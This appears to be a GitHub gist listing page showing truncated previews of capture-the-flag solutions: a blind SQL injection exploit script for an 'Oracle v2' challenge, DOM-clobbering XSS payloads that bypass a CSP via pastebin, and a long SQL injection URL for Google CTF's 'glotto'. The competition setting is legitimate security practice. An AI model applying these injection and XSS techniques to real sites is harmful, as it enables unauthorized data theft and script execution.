terjanq
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * This is a solution to "Car repair shop" challenge from hack.lu ctf 2019 | |
| * Solves: 9 | |
| * 10/23/2019 © by terjanq | |
| */ | |
| /* The idea of the solution is: */ | |
| function WoW(){ this.Oo = 'O.o'; } | |
| var x = new WoW(); |
terjanq
/ exploit.js
Last active
January 12, 2025 18:10
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const fetch = require('node-fetch'); | |
| var flag = 'nn9ed{' | |
| var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}' | |
| var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}'); | |
| var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect | |
| const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/' | |
| // Generates definitions for fonts | |
| function generateFonts() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- 225 char solution (remove new lines) --> | |
| <a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
| <form id=CONFIG> | |
| <img id=testPath name=test> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Solution 214 - with a strange behaviour in browsers (remove new lines) --> | |
| <a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
| <form id=CONFIG> | |
| <img id=test> | |
| <a> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Solution 212! (remove new lines) --> | |
| <a id=CONFIG name=test> | |
| <p> | |
| <a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
| <p> | |
| T |
terjanq
/ straight-forward-solution.html
Last active
September 23, 2019 15:45
XSS Challenge DOM Clobbering
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a href="https://pastebin.com" id="testPath"></a> | |
| <a id="CONFIG" name=test></a> | |
| <a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| window.CONFIG = window.CONFIG || { | |
| version: "v20190816", | |
| test: false, | |
| appName: "XSS Challenge", | |
| } | |
| function loadModule(moduleName) { | |
| const scriptSrc = new URL(document.currentScript.src); | |
| let url = ''; | |
terjanq
/ injection_point.js
Created
September 23, 2019 14:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const sanitized = DOMPurify.sanitize(input.value); | |
| const html = ` | |
| <meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/"> | |
| <h1>Homepage!</h1> | |
| <p>Welcome to my homepage! Here are some info about me:</p> | |
| ${sanitized} | |
| <script nonce=xyz src="./main.js"><\/script> | |
| `; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!doctype html><meta charset=utf-8> | |
| <title>SecurityMB's Security Challenge</title> | |
| <style> | |
| * { | |
| font-family: monospace; | |
| } | |
| textarea { | |
| width:100%; | |
| height:90px; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://glotto.web.ctfcompetition.com/?order0=date`=(SELECT+1337+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@ |